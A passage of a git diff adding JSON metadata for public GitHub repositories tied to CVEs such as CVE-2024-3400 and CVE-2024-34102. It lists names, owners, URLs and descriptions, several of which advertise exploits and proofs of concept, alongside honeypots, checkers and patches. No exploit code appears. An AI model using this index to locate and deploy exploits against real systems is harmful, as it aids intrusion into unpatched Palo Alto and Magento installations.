"watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791330659, + "name": "CVE-2024-3400-pot", + "full_name": "zam89\/CVE-2024-3400-pot", + "owner": { + "login": "zam89", + "id": 3533227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3533227?v=4", + "html_url": "https:\/\/github.com\/zam89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zam89\/CVE-2024-3400-pot", + "description": "Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability", + "fork": false, + "created_at": "2024-04-24T14:21:26Z", + "updated_at": "2024-05-28T19:54:26Z", + "pushed_at": "2024-05-26T15:49:45Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-3400", + "flask", + "honeypot", + "python", + "python-3", + "python3" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791335435, + "name": "CVE-2024-3400-Checker", + "full_name": "terminalJunki3\/CVE-2024-3400-Checker", + "owner": { + "login": "terminalJunki3", + "id": 43526239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43526239?v=4", + "html_url": "https:\/\/github.com\/terminalJunki3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/terminalJunki3\/CVE-2024-3400-Checker", + "description": "Check to see if your Palo Alto firewall has been compromised by running script againt support bundle. ", + "fork": false, + "created_at": "2024-04-24T14:30:34Z", + "updated_at": "2024-04-25T13:15:04Z", + "pushed_at": "2024-04-25T13:15:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791764978, + "name": "CVE-2024-3400-Palo-Alto-OS-Command-Injection", + "full_name": "0xr2r\/CVE-2024-3400-Palo-Alto-OS-Command-Injection", + "owner": { + "login": "0xr2r", + "id": 72355033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72355033?v=4", + "html_url": "https:\/\/github.com\/0xr2r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xr2r\/CVE-2024-3400-Palo-Alto-OS-Command-Injection", + "description": null, + "fork": false, + "created_at": "2024-04-25T10:23:03Z", + "updated_at": "2024-06-13T04:13:12Z", + "pushed_at": "2024-04-25T11:49:04Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792861986, + "name": "CVE-2024-3400", + "full_name": "marconesler\/CVE-2024-3400", + "owner": { + "login": "marconesler", + "id": 168297747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168297747?v=4", + "html_url": "https:\/\/github.com\/marconesler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/marconesler\/CVE-2024-3400", + "description": "Exploit for GlobalProtect CVE-2024-3400", + "fork": false, + "created_at": "2024-04-27T18:58:41Z", + "updated_at": "2024-06-29T05:07:21Z", + "pushed_at": "2024-04-27T19:02:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 799662179, + "name": "CVE-2024-3400", + "full_name": "andrelia-hacks\/CVE-2024-3400", + "owner": { + "login": "andrelia-hacks", + "id": 110841971, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110841971?v=4", + "html_url": "https:\/\/github.com\/andrelia-hacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andrelia-hacks\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-05-12T19:48:20Z", + "updated_at": "2024-05-12T19:48:35Z", + "pushed_at": "2024-05-12T19:48:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801106921, + "name": "IPLineFinder", + "full_name": "tk-sawada\/IPLineFinder", + "owner": { + "login": "tk-sawada", + "id": 130136436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130136436?v=4", + "html_url": "https:\/\/github.com\/tk-sawada", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tk-sawada\/IPLineFinder", + "description": "Find rows contain specific IP addresses in large files and then, extract them. This tool make for investigating logs for cve-2024-3400", + "fork": false, + "created_at": "2024-05-15T15:50:32Z", + "updated_at": "2024-05-20T01:41:26Z", + "pushed_at": "2024-05-20T01:41:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802848040, + "name": "cve-2024-3400", + "full_name": "iwallarm\/cve-2024-3400", + "owner": { + "login": "iwallarm", + "id": 146454845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146454845?v=4", + "html_url": "https:\/\/github.com\/iwallarm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iwallarm\/cve-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-05-19T12:38:04Z", + "updated_at": "2024-05-23T19:11:53Z", + "pushed_at": "2024-05-23T19:11:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887034499, + "name": "CVE-2024-3400", + "full_name": "workshop748\/CVE-2024-3400", + "owner": { + "login": "workshop748", + "id": 101908212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101908212?v=4", + "html_url": "https:\/\/github.com\/workshop748", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/workshop748\/CVE-2024-3400", + "description": "Attempt at making the CVE-2024-3400 initial exploit (for educational purposes)", + "fork": false, + "created_at": "2024-11-12T03:46:39Z", + "updated_at": "2024-11-12T03:47:21Z", + "pushed_at": "2024-11-12T03:47:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34102.json b/2024/CVE-2024-34102.json new file mode 100644 index 0000000000..bf28e54799 --- /dev/null +++ b/2024/CVE-2024-34102.json @@ -0,0 +1,646 @@ +[ + { + "id": 821028616, + "name": "TestCVE-2024-34102", + "full_name": "ArturArz1\/TestCVE-2024-34102", + "owner": { + "login": "ArturArz1", + "id": 174043872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174043872?v=4", + "html_url": "https:\/\/github.com\/ArturArz1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ArturArz1\/TestCVE-2024-34102", + "description": null, + "fork": false, + "created_at": "2024-06-27T16:59:29Z", + "updated_at": "2024-06-27T17:07:33Z", + "pushed_at": "2024-06-27T17:07:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821056402, + "name": "CVE-2024-34102", + "full_name": "th3gokul\/CVE-2024-34102", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-34102", + "description": "CVE-2024-34102: Unauthenticated Magento XXE", + "fork": false, + "created_at": "2024-06-27T18:10:13Z", + "updated_at": "2024-11-17T22:47:14Z", + "pushed_at": "2024-08-14T15:10:47Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821130227, + "name": "CVE-2024-34102", + "full_name": "bigb0x\/CVE-2024-34102", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-34102", + "description": "POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento \/ Adobe Commerce. ", + "fork": false, + "created_at": "2024-06-27T21:57:24Z", + "updated_at": "2024-11-17T11:19:05Z", + "pushed_at": "2024-06-29T08:13:05Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 28, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 821393232, + "name": "CVE-2024-34102", + "full_name": "11whoami99\/CVE-2024-34102", + "owner": { + "login": "11whoami99", + "id": 122907550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122907550?v=4", + "html_url": "https:\/\/github.com\/11whoami99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/11whoami99\/CVE-2024-34102", + "description": "POC for CVE-2024-34102 : Unauthenticated Magento XXE and bypassing WAF , You will get http connection on ur webhook", + "fork": false, + "created_at": "2024-06-28T12:45:40Z", + "updated_at": "2024-07-02T12:02:29Z", + "pushed_at": "2024-07-01T03:20:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821443628, + "name": "CVE-2024-34102", + "full_name": "d0rb\/CVE-2024-34102", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-34102", + "description": "A PoC demonstration , critical XML entity injection vulnerability in Magento", + "fork": false, + "created_at": "2024-06-28T14:50:29Z", + "updated_at": "2024-06-28T14:52:44Z", + "pushed_at": "2024-06-28T14:52:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821600228, + "name": "CVE-2024-34102", + "full_name": "Chocapikk\/CVE-2024-34102", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-34102", + "description": "CosmicSting (CVE-2024-34102)", + "fork": false, + "created_at": "2024-06-28T23:33:21Z", + "updated_at": "2024-11-20T16:30:52Z", + "pushed_at": "2024-09-05T18:38:46Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 40, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822233085, + "name": "CVE-2024-34102", + "full_name": "0x0d3ad\/CVE-2024-34102", + "owner": { + "login": "0x0d3ad", + "id": 18898977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4", + "html_url": "https:\/\/github.com\/0x0d3ad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2024-34102", + "description": "Magento XXE (CVE-2024-34102)", + "fork": false, + "created_at": "2024-06-30T16:49:26Z", + "updated_at": "2024-07-07T16:06:06Z", + "pushed_at": "2024-07-01T17:42:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822404350, + "name": "CVE-2024-34102", + "full_name": "cmsec423\/CVE-2024-34102", + "owner": { + "login": "cmsec423", + "id": 174170165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174170165?v=4", + "html_url": "https:\/\/github.com\/cmsec423", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cmsec423\/CVE-2024-34102", + "description": "Magento XXE", + "fork": false, + "created_at": "2024-07-01T05:06:42Z", + "updated_at": "2024-07-01T05:06:42Z", + "pushed_at": "2024-07-01T05:06:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822404987, + "name": "Magento-XXE-CVE-2024-34102", + "full_name": "cmsec423\/Magento-XXE-CVE-2024-34102", + "owner": { + "login": "cmsec423", + "id": 174170165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174170165?v=4", + "html_url": "https:\/\/github.com\/cmsec423", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cmsec423\/Magento-XXE-CVE-2024-34102", + "description": null, + "fork": false, + "created_at": "2024-07-01T05:08:37Z", + "updated_at": "2024-07-01T05:08:37Z", + "pushed_at": "2024-07-01T05:08:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822475682, + "name": "CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento", + "full_name": "jakabakos\/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento", + "description": "CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)", + "fork": false, + "created_at": "2024-07-01T08:19:28Z", + "updated_at": "2024-11-23T16:33:21Z", + "pushed_at": "2024-07-05T09:26:02Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825491938, + "name": "cosmicsting-validator", + "full_name": "SamJUK\/cosmicsting-validator", + "owner": { + "login": "SamJUK", + "id": 7872420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7872420?v=4", + "html_url": "https:\/\/github.com\/SamJUK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SamJUK\/cosmicsting-validator", + "description": "CosmicSting (CVE-2024-34102) POC \/ Patch Validator", + "fork": false, + "created_at": "2024-07-07T23:35:18Z", + "updated_at": "2024-07-13T16:59:26Z", + "pushed_at": "2024-07-13T16:59:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cosmicsting", + "cve-2024-34102", + "devsecops", + "magento", + "magento-security-patches", + "poc", + "proof-of-concept", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825723072, + "name": "poc", + "full_name": "unknownzerobit\/poc", + "owner": { + "login": "unknownzerobit", + "id": 62531811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62531811?v=4", + "html_url": "https:\/\/github.com\/unknownzerobit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unknownzerobit\/poc", + "description": "poc for CVE-2024-34102 ", + "fork": false, + "created_at": "2024-07-08T11:23:12Z", + "updated_at": "2024-07-08T11:41:56Z", + "pushed_at": "2024-07-08T11:41:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827307888, + "name": "CVE-2024-34102", + "full_name": "crynomore\/CVE-2024-34102", + "owner": { + "login": "crynomore", + "id": 27213554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27213554?v=4", + "html_url": "https:\/\/github.com\/crynomore", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crynomore\/CVE-2024-34102", + "description": "Burp Extension to test for CVE-2024-34102", + "fork": false, + "created_at": "2024-07-11T11:54:08Z", + "updated_at": "2024-07-11T11:54:43Z", + "pushed_at": "2024-07-11T11:54:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828170201, + "name": "CVE-2024-34102", + "full_name": "bughuntar\/CVE-2024-34102", + "owner": { + "login": "bughuntar", + "id": 99727538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99727538?v=4", + "html_url": "https:\/\/github.com\/bughuntar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bughuntar\/CVE-2024-34102", + "description": "Exploitation CVE-2024-34102", + "fork": false, + "created_at": "2024-07-13T10:25:23Z", + "updated_at": "2024-08-26T01:45:05Z", + "pushed_at": "2024-07-15T04:16:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-34102", + "exploitation" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828292663, + "name": "CVE-2024-34102-Python", + "full_name": "bughuntar\/CVE-2024-34102-Python", + "owner": { + "login": "bughuntar", + "id": 99727538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99727538?v=4", + "html_url": "https:\/\/github.com\/bughuntar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bughuntar\/CVE-2024-34102-Python", + "description": "CVE-2024-34102 Exploiter based on Python", + "fork": false, + "created_at": "2024-07-13T17:31:10Z", + "updated_at": "2024-07-15T04:16:38Z", + "pushed_at": "2024-07-15T04:16:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-34102" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828468155, + "name": "CVE-2024-34102", + "full_name": "Phantom-IN\/CVE-2024-34102", + "owner": { + "login": "Phantom-IN", + "id": 65243646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65243646?v=4", + "html_url": "https:\/\/github.com\/Phantom-IN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Phantom-IN\/CVE-2024-34102", + "description": null, + "fork": false, + "created_at": "2024-07-14T08:40:59Z", + "updated_at": "2024-10-08T05:22:23Z", + "pushed_at": "2024-07-14T08:42:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 839724541, + "name": "magento2-cosmic-sting-patch", + "full_name": "wubinworks\/magento2-cosmic-sting-patch", + "owner": { + "login": "wubinworks", + "id": 127310257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127310257?v=4", + "html_url": "https:\/\/github.com\/wubinworks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wubinworks\/magento2-cosmic-sting-patch", + "description": "Magento 2 patch for CVE-2024-34102(aka CosmicSting). Another way(as an extension) to hotfix the security hole if you cannot apply the official patch or cannot upgrade Magento.", + "fork": false, + "created_at": "2024-08-08T07:47:24Z", + "updated_at": "2024-10-25T10:44:59Z", + "pushed_at": "2024-08-08T08:31:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bug", + "cosmicsting", + "cve-2024-34102", + "extension", + "hotfix", + "magento2", + "patch", + "security-hole" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841861554, + "name": "CVE-2024-34102", + "full_name": "EQSTLab\/CVE-2024-34102", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-34102", + "description": "PoC for CVE-2024-34102", + "fork": false, + "created_at": "2024-08-13T07:33:20Z", + "updated_at": "2024-10-04T10:38:23Z", + "pushed_at": "2024-08-13T08:48:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844692267, + "name": "CVE-2024-34102", + "full_name": "dream434\/CVE-2024-34102", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2024-34102", + "description": "adobe commerce", + "fork": false, + "created_at": "2024-08-19T19:25:48Z", + "updated_at": "2024-10-09T13:47:19Z", + "pushed_at": "2024-10-09T13:47:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869658204, + "name": "magento-cve-2024-34102-exploit-cosmicstring", + "full_name": "bka\/magento-cve-2024-34102-exploit-cosmicstring", + "owner": { + "login": "bka", + "id": 584644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/584644?v=4", + "html_url": "https:\/\/github.com\/bka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bka\/magento-cve-2024-34102-exploit-cosmicstring", + "description": null, + "fork": false, + "created_at": "2024-10-08T17:02:11Z", + "updated_at": "2024-10-09T12:33:40Z", + "pushed_at": "2024-10-09T12:33:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34144.json b/2024/CVE-2024-34144.json new file mode 100644 index 0000000000..3b86caa7cd --- /dev/null +++ b/2024/CVE-2024-34144.json @@ -0,0 +1,33 @@ +[ + { + "id": 835035053, + "name": "CVE-2024-34144", + "full_name": "MXWXZ\/CVE-2024-34144", + "owner": { + "login": "MXWXZ", + "id": 16700613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16700613?v=4", + "html_url": "https:\/\/github.com\/MXWXZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MXWXZ\/CVE-2024-34144", + "description": "PoC for CVE-2024-34144", + "fork": false, + "created_at": "2024-07-29T03:02:39Z", + "updated_at": "2024-09-23T08:58:10Z", + "pushed_at": "2024-07-29T11:23:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34220.json b/2024/CVE-2024-34220.json new file mode 100644 index 0000000000..3d04598e8b --- /dev/null +++ b/2024/CVE-2024-34220.json @@ -0,0 +1,33 @@ +[ + { + "id": 792704109, + "name": "CVE-2024-34220", + "full_name": "dovankha\/CVE-2024-34220", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34220", + "description": "CVE-2024-34220 | SQL injection", + "fork": false, + "created_at": "2024-04-27T10:32:10Z", + "updated_at": "2024-05-16T14:49:52Z", + "pushed_at": "2024-05-16T14:49:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34221.json b/2024/CVE-2024-34221.json new file mode 100644 index 0000000000..70cb9e959f --- /dev/null +++ b/2024/CVE-2024-34221.json @@ -0,0 +1,33 @@ +[ + { + "id": 798218314, + "name": "CVE-2024-34221", + "full_name": "dovankha\/CVE-2024-34221", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34221", + "description": "CVE-2024-34221 | Insecure pemission", + "fork": false, + "created_at": "2024-05-09T10:32:30Z", + "updated_at": "2024-05-11T10:46:45Z", + "pushed_at": "2024-05-11T08:19:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34222.json b/2024/CVE-2024-34222.json new file mode 100644 index 0000000000..9791836fa3 --- /dev/null +++ b/2024/CVE-2024-34222.json @@ -0,0 +1,33 @@ +[ + { + "id": 799116642, + "name": "CVE-2024-34222", + "full_name": "dovankha\/CVE-2024-34222", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34222", + "description": "CVE-2024-34222 | SQL injection", + "fork": false, + "created_at": "2024-05-11T08:20:55Z", + "updated_at": "2024-05-11T10:46:24Z", + "pushed_at": "2024-05-11T08:34:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34223.json b/2024/CVE-2024-34223.json new file mode 100644 index 0000000000..9ebfc8a926 --- /dev/null +++ b/2024/CVE-2024-34223.json @@ -0,0 +1,33 @@ +[ + { + "id": 799120747, + "name": "CVE-2024-34223", + "full_name": "dovankha\/CVE-2024-34223", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34223", + "description": "CVE-2024-34223 | Insecure permission", + "fork": false, + "created_at": "2024-05-11T08:36:16Z", + "updated_at": "2024-05-11T10:47:53Z", + 